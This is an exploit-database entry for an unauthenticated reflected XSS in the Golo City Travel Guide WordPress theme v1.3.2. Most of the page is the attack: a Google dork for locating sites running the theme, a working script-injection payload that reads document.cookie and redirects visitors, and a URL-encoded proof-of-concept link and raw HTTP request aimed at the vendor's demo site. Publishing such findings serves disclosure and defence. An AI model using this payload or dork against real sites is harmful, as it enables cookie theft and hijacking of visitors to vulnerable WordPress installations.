Golo - City Travel Guide WordPress Theme v1.3.2 - Unauthenticated Reflected XSS
CVE
Category
Price
Severity
CWE-79
Not specified
Medium
Author
Risk
Exploitation Type
Date
Exploit Alert
High
Remote
2020-07-13
CPE
cpe:cpe:/a:wordpress:golo_city_travel_guide:1.3.2
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070068 Golo - City Travel Guide WordPress Theme v1.3.2 - Unauthenticated Reflected XSS [+] Exploit Title: Golo - City Travel Guide WordPress Theme v1.3.2 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/golo/
[+] Date: 2020-07-01
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Uxper [ http://uxper.co ]
[+] Software Version: 1.3.2
[+] Software Link: https://themeforest.net/item/golo-city-guide-wordpress-theme/25397810
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-79
### [ Info: ]
[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Golo theme v1.3.2 for WordPress.
### [ Payload: ]
[$] "><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">
### [ PoC: ]
[!] https://wp.getgolo.com/?s=%22%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E&post_type=place
[!] GET /?s=%22%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E&post_type=place HTTP/1.1
Host: wp.getgolo.com
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum